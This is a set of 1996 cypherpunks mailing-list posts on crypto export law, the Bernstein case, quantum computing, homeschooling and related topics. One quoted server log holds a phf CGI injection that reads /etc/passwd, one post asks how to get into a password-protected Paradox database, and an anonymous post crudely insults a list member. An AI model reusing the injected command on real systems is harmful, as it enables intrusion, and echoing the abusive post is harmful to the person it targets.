http://www.ozemail.com.au/~geoffk/pke/ . I'd appreciate people looking over it, particularly the random number generation. [The prototype is actually somewhat useful. It's about as secure as downloading PGP in binary form... ] -- -Geoff Keating (geoffk at ozemail.com.au, Geoff.Keating at anu.edu.au) From tcmay at got.net Mon Sep 23 05:41:35 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 20:41:35 +0800 Subject: provably hard PK cryptosystems Message-ID: I want to say something about "tiling problems," an area I find very exciting. I ordinarily would not have commented on "quantum computers," but will make just a couple of comments, since I want to comment later on tilings. At 9:58 PM 9/22/96, Adam Back wrote: ... >I'm not sure about quantum computers, some people who know much more >about particle physics than I do seemed initially sceptical, and >didn't think it was doable. However I have read some optimistic >sounding news clippings (on the list) which sounded as if things are >progressing well, with techniques being found using redundancy to get >around what were earlier problems of reliability. Is this accurate >reporting (thinking of garbled stories by over enthusiastic >journalists)? I'd be interested to hear opinions from anyone who does >know about particle physics about the likihood of practical quantum >computers being practical in the next 20 years or so. Caveat: I'm a skeptic on quantum computers. I've read a couple of the early papers, but am not current. And I certainly am not an expert. For what it's worth: * I think it's nearly certain that no significant results will be gotten in the next 20 years, probably not in the next 50 years. (I personally am skeptical that significant results will be gotten in 200 years, and probably never, but this is a harder point to make.) * Sure, there may be demonstrations of a "collapsed quantum state" which is isomorphic to factoring a number like "42," but not 50-digit numbers anytime soon. And, I feel, a 300-digit number is probably many, many orders of magnitude harder. * Experts may point to partial successes, and maybe they're right. But I'm skeptical. The recent post by someone outlining a bunch of "promising approaches" has got me thinking of spending some more time looking at recent results, though. I doubt anything will happen in the next 20 years...that just isn't much time in the high-tech business (which may sound crazy, but it's true). (A way to "creatively visualize" this point is this: for those of you who are now 25, when you are 45 the world will probably _not_ be radically different. Sure, computers will be faster and cheaper, but most things will look _mostly_ the way they look today. Not a compelling argument, perhaps, but one which makes sense to me. When I was 25 I suppose I expected dramatic advances to come...largely, they haven't. I can elaborate on this if there's sufficient interest.) >One other area that did sound promising was some kind of mapping >problem in n dimensional tiling that Tim was discussing at a physical >meet while I was over in the US. A news clipping posted to One of the most interesting books I've read is David Harel's "Algorithmics: The Spirit of Computing." (Warning: The book came out in a second edition, which as near as I can tell took out some parts and synopsized the book a bit. My reading was of the First Edition.) Harel described Huang's work on "tiling problems." These are easier to describe with pictures, and I don't have the time to try to generate ASCII representations of tiles. So, I refer people to Harel's book. Briefly, imagine a grid in a plane. Imagine a set of "dominoes" or "tiles" with different edge properties, e.g., some edges are blue, some red, some green, etc. (or the edges can be numbered, have symbols on them, etc.). Suppose one has an unlimited supply of, for example, N different type of tiles. Suppose a tile is placed at some place on the grid, and another tile (possibly a different tile, possibly the same type of tile) is placed some distance away on the grid. The problem is this: Can a "domino snake" be found which reaches from the first tile to the second tile, with the constraint that edges must match up on all tiles? (And all tiles must be in normal grid locations, of course) If the grid area is, say, a finite space, then clearly an exhaustive search of all legal domino snakes would answer the question. (However, even a relatively small grid of, say, 8 x 8, generates a truly enormous number of possible snakes, each of which must be tested. Of course, if a domino snake is "guessed" (a la the "nondeterministic" language one encounters in complexity theory), verification that it is answer is nearly instantaneous (one glances at the solution and verifies it). If the grid is unlimited, then even if the two initial tiles are located close together, there are of course an infinite number of possible snakes.... (Oddly, to me, the domino snake problem is "more undecidable" in the infinite half-plane that in the full infinite plane....) Huang proved that the domino tiling problem is formally equivalent to the standard set of NP problems (consult Harel, or Huang, for more details and more precise language...I'm just going from recollection here!). I like this approach because I can easily visualize the domino tiling problem and can make some points about expansion of knowledge into uncharted areas (research and tool-building is a kind of domino snake expansion, with local laws of physics, etc., the constraints on stepping stones (hand wave inserted here)). I find this easier to understand than more "algebraic" and "logical" versions, such as the representation problem and the word problem. (These other NP problems are also described in Harel (and in standard complexity books, such as Garey and Johnson, Papadimitrou, etc.). It has always been a great hope that some of the provably-hard problems be adapted for use in crypto. And yet factoring remains the core of popular modern crypto programs (discrete logs, too, for D-H). I don't think this is a major cause for worry, though. It's not as if factoring is suddenly going to become "easy." (I think the consensus is that factoring _is_ hard. Whether RSA is really equivalent to factoring also hasn't been proved, as folks have noted, but many think it is, loosely speaking.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Mon Sep 23 05:54:52 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 20:54:52 +0800 Subject: Mercenaries Message-ID: At 4:45 AM 9/23/96, Brian Davis wrote: >On Wed, 18 Sep 1996, Timothy C. May wrote: >> Brian Davis, our former Prosecutor, can tell us how likely it is that any >> person would be charged and brought to trial for being a paid mercenary for >> some small country in the Third World. The CIA is often behind such >> mercenaries, so national security issues could make the issue murky. > >Exceedingly unlikely. A variety of practical problems. If you came up >to a U.S. Attorney to show him your picture on the cover of The Zaire Daily >News as mercenary of the week and spit in his face, you'd get prosecuted. > >For spitting in the prosecutor's face. > >On a slightly more serious note: you'd only get prosecuted in someone at >Main Justice (i.e. in Washington) wanted you prosecuted. This of course matches my expectation. I still think if prosecution is so unlikely, the law ought to actually come to terms with this and remove the "official illegality" of such things. _Almost_ more important to me than "libertarian" ideals are "consistency" ideals: namely, that there oughtn't to be laws which are not enforced, or which are too expensive to enforce, or which can be selectively enforced. And since I know that the full suite of laws, all 25,000 or 45,000 of them (on all 27 linear feet of bookshelf space) cannot possibly be consistently enforced, I favor a "minimalist" or "fallback" position of having relatively few laws, covering mostly "crimes" which are more easily detected and prosecuted (with draconian punishments). >> But the real reason such prosecutions are rare is that the government >> realizes how Orwellian it sounds to say: >> >> "You are being prosecuted because you were a mercenary for Oceania in its I was probably overstating things to say this was "the real reason." The real reason (or the more important reason) is that resources are finite, and, as Brian noted, no prosecutor is much interested in someone being in Zaire's mercenary army. It doesn't register on the public's concern meter, and it probably doesn't get one promotions in the prosecutorial community. But the law should still be changed to reflect this reality. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Mon Sep 23 06:31:11 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 23 Sep 1996 21:31:11 +0800 Subject: Bernstein hearing: The Press Release Message-ID: At 5:10 AM 9/23/96, Brian Davis wrote: ... >There isn't such a clause. The allowed restrictions were developed in >case law. > >Constitutional literalists take note: the First Amendment says nothing >about what the executive branch or the states can do .... Which is why President Jefferson was able to say: "While the Constitution says "Congress shall make no law...," I am hereby outlawing all discussion of the following subjects:.... And I have had it with the Catholics and Jews in this country. While Congress has no power to make laws respecting the establishment of religion or the exercise thereof, I am under no such restrictions. Therefore, I am ordering the immediate arrest and summary execution of all Papists and Jews...." Seriously, does not the Constitution and Bill of Rights define what states may do? And Presidents? The Executive is under various restrictions, and cannot behave unconstitutionally. After all, if Alabama, for example, reinstituted slavery, would not the 14th Amendment trump this? If California were to, say, ban speech critical of women's or homosexual's rights, would not the First Amendment trump this attempt? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From adam at homeport.org Mon Sep 23 07:25:22 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 23 Sep 1996 22:25:22 +0800 Subject: Where to write crypto? In-Reply-To: <9609230633.AA18985@srzts100.alcatel.ch> Message-ID: <199609231224.HAA02299@homeport.org> Remo Pini wrote: | > If I want to go to a country outside the United States to write | > cryptographic code that will be freely distributable, what's the | > best place to go? | | Switzerland has NO crypto laws (yet)... Switzerland is not the most liberal (libertarian) of countries. Getting a work permit can be very tough. However, there are crypto companies and research groups. Haeglin and ETH-Zurich (ETH is Swiss Federal Institute of Technology) spring to mind. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From geoffk at discus.anu.edu.au Mon Sep 23 07:50:56 1996 From: geoffk at discus.anu.edu.au (Geoffrey KEATING) Date: Mon, 23 Sep 1996 22:50:56 +0800 Subject: (Fwd) Australian "ITAR" regulations In-Reply-To: <199609230132.LAA08960@rosella.osa.com.au> Message-ID: <199609230830.SAA00374@discus.anu.edu.au> > Peter Trei writes: > > Forwarded from the cypherpunks list... > > http://www.austlii.edu.au/cgi-bin/sinodisp.pl/au/legis/cth/consol_reg/cer439/sch13.html?query=cryptographic > > Thanks for posting this URL Peter. Of particular note is the heading: > > > 43. Other goods as follows: > > An anonymous opinion from inside the Defence Dept holds that electronic > bits on a wire do not constitute goods, and as a result if you ship > electronically, you are not subject to the regulations. If you ship a > CD or floppy or other physical media containing software, you violate the > regulations. If you glance at reg. 13b, under 'software', you'll find that it specifically says '"software" means [program(s)] fixed in any tangible medium of expression'. -- -Geoff Keating (Geoff.Keating at anu.edu.au) From frissell at panix.com Mon Sep 23 07:52:51 1996 From: frissell at panix.com (Duncan Frissell) Date: Mon, 23 Sep 1996 22:52:51 +0800 Subject: Where to write crypto? Message-ID: <3.0b19.32.19960923075240.00e9ea44@panix.com> At 08:33 AM 9/23/96 +0200, Remo Pini wrote: >Switzerland has NO crypto laws (yet)... > However they are cooperating with the Gang of Seven (G7) Net restriction efforts. See: http://www.admin.ch/ejpd/d/bj/internet/indexe.htm DCF From adam at homeport.org Mon Sep 23 08:31:00 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 23 Sep 1996 23:31:00 +0800 Subject: Internet File System? In-Reply-To: <1.5.4.32.19960922191022.00736898@pop.mindspring.com> Message-ID: <199609231251.HAA02343@homeport.org> John Brothers wrote: | The other day, it occurred to me that Java could really take off if there | was some sort of file system. And, since you can't write to local files | with Java, the obvious solution is to set up the 'fopen, fclose(), etc) | set of functions that are 'rpcs' to some server application on the same | computer as the web server the applet comes from. Interesting idea. But, this requires that for disk access, the applet have network access. Violates the principle of least privledge. The correct solution seems to me give the applet limited local disk access. To those who claim this can't be done, I point to the UNIX kernel, which, with a small set of primitives, controls disk access pretty effectively. (Quotas were added in 1984.) This micro kernel could be added outside of the Java VM, so that the Java code can't touch it, only call it. The V7 kernel is pretty small and efficient by todays standards. Might want to use BSD4.4 instead, and also get portals, which would allow you to use /dev/tcp/www.netscape.com/80 as a file with certain permissions. See http://www.bsdi.com/bsdi-man?proto=1.1&msection=ALL&apropos=1&query=portal Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From m5 at tivoli.com Mon Sep 23 08:48:40 1996 From: m5 at tivoli.com (Mike McNally) Date: Mon, 23 Sep 1996 23:48:40 +0800 Subject: Public Schools In-Reply-To: Message-ID: <324677FF.3A48@tivoli.com> Timothy C. May wrote: > > At 4:31 AM 9/23/96, Lucky Green wrote: > >On Sun, 22 Sep 1996, snow wrote: > >> I would agree that parents can do as good or better at _most_ > >> subjects thru about the 3rd or 4th grade, and I do agree that > >> most of todays schools are shit, however there is one area-- > >> social skills--that homeschooling simply can't compete. Proponents of mass public education love to trot that one out, probably because it sounds good and appeals to common sense. However, I sincerely doubt it's true in any way. For example, I'd like to see some actual comparison of the social skills (and, umm, how do you measure that anyway? I don't remember taking any social skills tests in school to make sure I was acquiring that valuable stuff) of public school victims and homeschooled people. If it's such a problem, where are all those social freaks who got that way due to homeschooling? Before the Industrial Revolution, homeschooling was of course quite common. Many "public schools" were simply cheap boarding houses for lower-middle class children (see Nicholas Nickelby for a colorful example). Those with the means hired tutors. > >> Children need to learn how to interact with one another in groups > >> larger than a family unit. I don't think that homeschooling can > >> accomplish this nearly as well as the public (or private) schools > >> could. Please note that homeschooling does not imply that parents isolate their children from contact with the world until they're at voting age. Also, note that the public elementary schools I attended seemed hell-bent on *preventing* any sort of interaction with a group of peers. I don't recall being encouraged to do much but shut up and perform the uninspired textbook assignments I was given. ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From DMiskell at envirolink.org Mon Sep 23 09:19:30 1996 From: DMiskell at envirolink.org (Daniel Christopher Miskell) Date: Tue, 24 Sep 1996 00:19:30 +0800 Subject: A daily warning regarding Tim ... [edited] Message-ID: >On Fri, 20 Sep 1996, John Anonymous MacDonald wrote: > >> Tim C[*] * studied yoga back-streching exercises for >> five years so he could * * (*). > >Likely the NSA has nothing better to do these days. They got bored with >just listening, so now they're spamming. Can we lock this fucker out of >the list? Sure, he'll probably pick another nym to post from... > Can't lock him out of the list, but you can either set up a kill file, or find something like the 3.0b version of Eudora, which has filters; you can set it up where, if an incoming message has a certain From: string, it is transferred directly into the Trash mail folder, which is, as a rule, cleaned up before quitting. Daniel. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From runnerfx at octet.com Mon Sep 23 10:13:42 1996 From: runnerfx at octet.com (Wearen Life) Date: Tue, 24 Sep 1996 01:13:42 +0800 Subject: Go away CIA In-Reply-To: Message-ID: The CIA has many powers both great and small. If the can cover up findings of UFO's and Murders I am pretty sure they can watch some puny web server. On Sun, 22 Sep 1996, Shane Brath wrote: > > > On Sat, 21 Sep 1996, Wearen Life wrote: > > > I wont be suprised if they where ALSO watching who was visting your page. > > I think now is the time to start looking in your hard drive or floppy > > disk for anything that my incrimanate you. (did i spell that right)? > > My 2 cents. > > But how would they go about globaly watching who goes to your URL, unless > they hack into your server and look at the log, or have a network sniffer > at a access point feeding you? > > > > Well well... > > > > > > After putting up the CIA hack mirror page on http://www.skeeve.net/cia/ > > > I learnt a few things. > > > > > > o it got 50,000 hits in 1 day > > > o everyone from the cia, senate, fbi, nsa (ncsc) and every other bloody US gov > > > department looked at it masses of times. The CIA looked at it every 10-15 > > > minutes. > > > zztop{root}:15: cat skeeve.net-access_log | grep ucia.gov | wc -l > > > 281 > > > > > > o Even the CIA tries to hack you. > > > > > > relay1-ext.ucia.gov unknown - [21/Sep/1996:01:56:44 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 1180 > > > > > > o Dozens of in.fingerd/in.telnetd attempts from ucia.gov, some mil sites and > > > ncsc.mil sites. > [ rest of text snipped ] > From carboy at hooked.net Mon Sep 23 10:17:00 1996 From: carboy at hooked.net (Michael E. Carboy) Date: Tue, 24 Sep 1996 01:17:00 +0800 Subject: Snooping ISP admin?? Message-ID: <32468D68.5E2@hooked.net> Greetings All, Question for the group: I have encountered a situation that causes me to believe an ISP is snoopingthrough encrytped mail. It seems that PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have encountered "POP3 account in use by another user" several times in the past few days and I am the only user... wondering if that "in use" messsage is the result of a clumsy sysadmin being caught with his hand in the cookie jar. Any thoughts from the group??? If those more knowledgeable than I deem these NOISE... my sincere apologies. regards, Michael E. Carboy carboy at hooked.net carboy at carboy.com From pgut001 at cs.auckland.ac.nz Mon Sep 23 12:57:44 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Tue, 24 Sep 1996 03:57:44 +0800 Subject: (Fwd) Australian "ITAR" regulations Message-ID: <84347922911395@cs26.cs.auckland.ac.nz> >>An anonymous opinion from inside the Defence Dept holds that electronic >>bits on a wire do not constitute goods, and as a result if you ship >>electronically, you are not subject to the regulations. If you ship a >>CD or floppy or other physical media containing software, you violate the >>regulations. > >Watch out for those anonymous opinions; I received exactly the opposite >opinion when I spoke to the Defence Signals Directorate about the issue >(back in 1994) -- after specifically asking about a few hypothetical >cases. Of course, either opinion may be correct, which is the real >problem! If the DSD is anything like our GCSB then what they'll have told you is what they'd like to be the case, not what's really the case. They will tell you what it pleases them to tell you, which doesn't necessarily have anything to do with the facts. The easiest way to check the real situation is to look at your customs act, the NZ Customs Act of 1995 (which in the relevant area is almost identical to the 1966 one) covers forms of export in excruciating detail. Doesn't mention anything about computer networks in there. In practice it'd have to be decided in the courts, but I don't think the DSD will take action because there's a very good chance they'd get a ruling against them, which is also why the NSA is so reluctant to enforce the ITAR in court. Peter. From talon57 at well.com Mon Sep 23 13:52:26 1996 From: talon57 at well.com (Brian D Williams) Date: Tue, 24 Sep 1996 04:52:26 +0800 Subject: USA_exe Message-ID: <199609231527.IAA24066@well.com> John (jya at pipeline.com) posts: >The Washington Post reports at length today on the Defense >Department's disclosure yesterday of heretofore classified >training manuals used in the School of the Americas to instruct >Latino troops on killing a wide range of civilians for political >purposes. This is not particularly new news, I have a copy at home of one of these manuals, it was put out by a humans rights group that got their hands on it during all the El Salvador business. It's as nasty as it sounds... Further info on request. Brian "Semiautomatic's and Boundless Love." From rah at shipwright.com Mon Sep 23 14:08:23 1996 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 24 Sep 1996 05:08:23 +0800 Subject: Bank for International Settlement's Security of Digital CashReport now on the web... Message-ID: --- begin forwarded text Sender: e$@thumper.vmeng.com Reply-To: Ian Grigg Precedence: Bulk Date: Mon, 23 Sep 1996 12:22:59 +0200 From: Ian Grigg To: Multiple recipients of Subject: BIS_rep Thanks to all the help I got last week, I have located the BIS report on Smart Card Security. I have C&P'd and squeezed it into HTML format. There are still many errors in it, notably many double words that C&P contributed, and I haven't touched the Annexes (messy footnotes, no graphics or headings). However, for those desparate to get their hands on it, go to our page: http://www.systemics.com/docs/papers/ and type (anti-bot protocol format): BIS_smart_security.html at the end of the URL. The real (no errors :-) document is located at: http://www.bis.org/publ/cpss18.htm but only the forward, exec summary and intro are there at the moment. When they are all there, I will drop my version. I am not really that keen on repairing the errors in my version, as I gather that BIS will make the original available some day. But last I looked, they didn't have an email address, so who can say? -- iang iang at systemics.com --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From frissell at panix.com Mon Sep 23 14:23:35 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 24 Sep 1996 05:23:35 +0800 Subject: Public Schools Message-ID: <3.0b19.32.19960923103721.00a13340@panix.com> On Sun, 22 Sep 1996, snow wrote: >I would agree that parents can do as good or better at _most_ >subjects thru about the 3rd or 4th grade, and I do agree that >most of todays schools are shit, however there is one area-- >social skills--that homeschooling simply can't compete. >From John Holt's "Teach Your Own" "If there were no other reason to homeschool your children, protecting them from the 'valuable social atmosphere' of the schools would be sufficient." John was a commie liberal BTW. He felt that the schools had a very nasty and artificial social environment with rigid age segregation that bore no resemblance to real life where there are people of wider age ranges. Certainly, most people suffer worse mistreatment from their "peers" at school than they do later in life. As a libertarian, I would add that the social atmosphere of a Stalinist "brain factory" is not exactly the socialization I would choose for my children. I would choose a more market oriented model. DCF "Even if they manage to teach nothing else, the very existence of government schools teaches State supremacy." From unicorn at schloss.li Mon Sep 23 14:24:52 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 24 Sep 1996 05:24:52 +0800 Subject: Where to write crypto? In-Reply-To: <3.0b19.32.19960923075240.00e9ea44@panix.com> Message-ID: On Mon, 23 Sep 1996, Duncan Frissell wrote: > At 08:33 AM 9/23/96 +0200, Remo Pini wrote: > >Switzerland has NO crypto laws (yet)... > > > > However they are cooperating with the Gang of Seven (G7) Net restriction > efforts. Switzerland is quickly becoming a G7 puppet. This is not a new trend. > > See: > > http://www.admin.ch/ejpd/d/bj/internet/indexe.htm > > DCF > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From ericm at lne.com Mon Sep 23 14:25:44 1996 From: ericm at lne.com (Eric Murray) Date: Tue, 24 Sep 1996 05:25:44 +0800 Subject: Snooping ISP admin?? In-Reply-To: <32468D68.5E2@hooked.net> Message-ID: <199609231530.IAA14624@slack.lne.com> Michael E. Carboy writes: > > Greetings All, > > Question for the group: I have encountered a situation that causes me > to believe an ISP is snoopingthrough encrytped mail. It seems that > PGP'd mail has aroused the curiosity of an ISP (not hooked.net).. I have > encountered "POP3 account in use by another user" several times in the > past few days and I am the only user... wondering if that "in use" > messsage is the result of a clumsy sysadmin being caught with his hand > in the cookie jar. It's from a clumsy programmer- popd is known to hang up under certain conditions. > Any thoughts from the group??? If the sysadmin is reading your PGP mail, let him. It's very very unlikely that he has the resources available to crack a PGP message in this century. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From jya at pipeline.com Mon Sep 23 14:33:08 1996 From: jya at pipeline.com (John Young) Date: Tue, 24 Sep 1996 05:33:08 +0800 Subject: PKI_gak Message-ID: <199609231748.RAA03243@pipe2.ny2.usa.pipeline.com> 9-21-96. MiPa: System and method for centralized session key distribution, privacy enhanced messaging and information distribution using a split private key public cryptosystem (Assignee -- Bell Atlantic Network Services, Inc.) The method and system also provide for authorized wiretapping, video and data distribution and private enhanced messaging (PEM). ----- http://jya.com/pkigak.txt (4 kb) PKI_gak From sunder at brainlink.com Mon Sep 23 14:34:15 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Tue, 24 Sep 1996 05:34:15 +0800 Subject: A daily warning regarding Tim ... [edited] In-Reply-To: Message-ID: On Mon, 23 Sep 1996, Daniel Christopher Miskell wrote: > Can't lock him out of the list, but you can either set up a kill file, or find > something like the 3.0b version of Eudora, which has filters; you can set it up > where, if an incoming message has a certain From: string, it is transferred > directly into the Trash mail folder, which is, as a rule, cleaned up before > quitting. Sure you can. Setup Majordomo to not accept subjects of "A daily warning regarding Tim" it seems all his messages have the same subject, and it seems to be automated. We can also go asshole on this list and not allow anyone who isn't subscribe to post. ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From richieb at teleport.com Mon Sep 23 14:43:49 1996 From: richieb at teleport.com (Rich Burroughs) Date: Tue, 24 Sep 1996 05:43:49 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <3.0b24.32.19960923071112.007208a8@mail.teleport.com> At 10:44 PM 9/22/96 -0700, John Gilmore wrote: [snip] >The wording there is taken directly from the controlling Supreme Court >case, which I believe is the Pentagon Papers case. I double-checked, and it is Potter Stewart from that case. Here's the whole paragraph: "But in the cases before us, we are asked neither to construe specific regulations nor to apply specific laws. We are asked, instead, to perform a function that the Constitution gave to the Executive, not the Judiciary. We are asked, quite simply, to prevent the publication by two newspapers of material that the Executive Branch insists should not, in the national interest, bepublished. I am convinced that the Executive is correct with respect to some of the documents involved. But I cannot say that disclosure of any of them will surely result in direct, immediate, and irreparable damage to our Nation or its people. That being so, there can under the First Amendment be but one judicial resolution of the issues before us. I join the judgments of the Court." Interestingly, Stewart says earlier: "I should suppose that moral, political, and practical considerations would dictate that a very first principle of that wisdom would be an insistence upon avoiding secrecy for its own sake. For when everything is classified, then nothing is classified, and the system becomes one to be disregarded by the cynical or the careless, and to be manipulated by those intent on self-protection or self-promotion. I should suppose, in short, that the hallmark of a truly effective internal security system would be the maximum possible disclosure, recognizing that secrecy can best be preserved only when credibility is truly maintained." http://www.nfoweb.com/folio.pgi/ussc-1/query=[field+case+name!3A!22new+york+ times!22]/doc/{@461998}/hit_headings? >The example used >in that case was the departure date and route of a ship carrying US >troops to war. The government could sue people who threatened to >publish such information, prior to publication, and have some chance >of winning the case. It's not a guarantee, just a pre-qualification. >The idea is that if they CAN'T show such a danger, they have NO chance >of winning. This is the beauty of Patel's earlier ruling. The fact that we are possibly talking about speech places a much stronger burden on the gov to restrict it. [snip] >The Supreme Court would ignore the prior restraint line issue anyway, >because it isn't a factor in this case. The government isn't arguing >that they have the right to prior-restrain us because of direct, >immediate and irreperable damage. Instead they argue that the >publication itself is being controlled only for its function, not for >the content of the publication, and therefore in controlling the >function, they can "incidentally" control the publication. [snip] Anyone who was at the hearing on Friday heard some form of the word "function" repeated many times. This definitely seems to be the heart of the gov's argument. I think it's not gonna float, but IANAL, either :) Rich ______________________________________________________________________ Rich Burroughs richieb at teleport.com http://www.teleport.com/~richieb See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon U.S. State Censorship Page at - http://www.teleport.com/~richieb/state New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause From jya at pipeline.com Mon Sep 23 14:45:55 1996 From: jya at pipeline.com (John Young) Date: Tue, 24 Sep 1996 05:45:55 +0800 Subject: TAG_ent Message-ID: <199609231749.RAA03296@pipe2.ny2.usa.pipeline.com> 09-21-96, MiPa: Trusted agents for open electronic commerce (Assignee -- Citibank, N.A.) Abstract: A system for open electronic commerce having a customer trusted agent securely communicating with a first money module, and a merchant trusted agent securely communicating with a second money module. Both trusted agents are capable of establishing a first cryptographically secure session, and both money modules are capable of establishing a second cryptographically secure session. ----- http://jya.com/tagent.txt (3 kb) TAG_ent --------- Reuters, 9-19-96 -- It will be 50 to 70 years before the majority of people do their business electronically, Citicorp Chairman John Reed told a conference on electronic money and banking. Issues related to privacy and security must be resolved for electronic banking to take off. Citicorp currently considers the Internet off-limits as a place to offer banking products until the security issues are solved, he said. "The Internet is fundamentally flawed in that regard right now," Reed said. "At this moment in time at least, we at Citicorp would feel very uncomfortable accommodating any transactions on the Internet," he said. From harmon at tenet.edu Mon Sep 23 14:49:13 1996 From: harmon at tenet.edu (Dan Harmon) Date: Tue, 24 Sep 1996 05:49:13 +0800 Subject: Public Schools In-Reply-To: <324677FF.3A48@tivoli.com> Message-ID: One of the hardest things that we have to work hardest to counter-act with our twins, who attend PS, is the socialization they pick up at school. Dan From attila at primenet.com Mon Sep 23 14:49:59 1996 From: attila at primenet.com (attila) Date: Tue, 24 Sep 1996 05:49:59 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: <199609231808.MAA09908@InfoWest.COM> In , on 09/23/96 at 07:23 AM, Declan McCullagh said: = .Clearly, speech that makes someone uncomfortable must be banned by = .the government. = .-Declan is that what you really meant? pretty liberal is it not? this gives in to the notion that if I'm standing on the street corner with a friend discussing anarchistic libertarian theory, and the proverbial fat lady waiting to cross the street has her 'common sense' offended and sings... this is what that big government liberal philosophy (and not just tax and spend) --regulation, and more regulation. they have already 'revised' in the name of political correctness even history. not withstanding that 'to the victor goes the spoils and the rewriting of history,' the Feds have already brainwashed the last generation of school children, using the very element of society who disdained the government --the 60s liberal. I dunno, declan, I did not really perceive you as a brain- washed, brain dead liberal. if what you stated above is true, it is totally opposite to your stand on freedom of speech and the CDA. care to mitigate that statement or defend it in terms of free speech? -- O, what a fall there was, my countrymen! Then I, and you, and all of us fell down, Whilst bloody treason flourish'd over us. -- Shakespeare (Julius Caesar) From declan at eff.org Mon Sep 23 14:50:11 1996 From: declan at eff.org (Declan McCullagh) Date: Tue, 24 Sep 1996 05:50:11 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: On Sun, 22 Sep 1996, Timothy C. May wrote: > If California were to, say, ban speech critical of women's or homosexual's > rights, would not the First Amendment trump this attempt? Not necessarily. The Supreme Court has upheld Title VII's ban on workplace "harassment." The Court said it occured when "discriminatory intimidation, ridicule, and insult" in a workplace create an uncomfortable "working environment." Then there's public accomodation law, under which the (I recall) Greek owner of a privately-operated diner was held liable for using the word "nigger" where a black woman could overhear. Clearly, speech that makes someone uncomfortable must be banned by the government. -Declan (More on some of this at http://joc.mit.edu/) // declan at eff.org // I do not represent the EFF // declan at well.com // From nobody at replay.com Mon Sep 23 14:50:26 1996 From: nobody at replay.com (Anonymous) Date: Tue, 24 Sep 1996 05:50:26 +0800 Subject: The periodic word of advice about Timmy C. Maypole, the pathological liar Message-ID: <199609231805.UAA28245@basement.replay.com> When Timmy C. Maypole's mother gave birth to him after fucking with a bunch of sailors, she didn't know who the father was but decided to tell him that he was a Russian as the Russian sailor was the one who satisfied her the most. From merriman at amaonline.com Mon Sep 23 14:51:00 1996 From: merriman at amaonline.com (David K. Merriman) Date: Tue, 24 Sep 1996 05:51:00 +0800 Subject: Paradox db passwords/encryption Message-ID: <199609231753.KAA22705@toad.com> -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com Date: Mon Sep 23 12:52:32 1996 Sorry to disturb everyone, but I've got a questions that is (gasp!) immediately related to crypto: Does anyone have any info on the encryption used in the Paradox (4.5 for Win) database? I've got someone that has an encrypted (well, password-protected :-) Paradox database that needs some maintenance, and the person that knew the password is now - shall we say - 'no longer with them'. Right now, doesn't matter if it's something clever, or a brute-force hack; they just need to get into the tables and such. Dave Merriman - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- PGP Email welcome, encouraged, and PREFERRED. Visit my web site at http://www.shellback.com/p/merriman for my PGP key and fingerprint "What is the sound of one hand 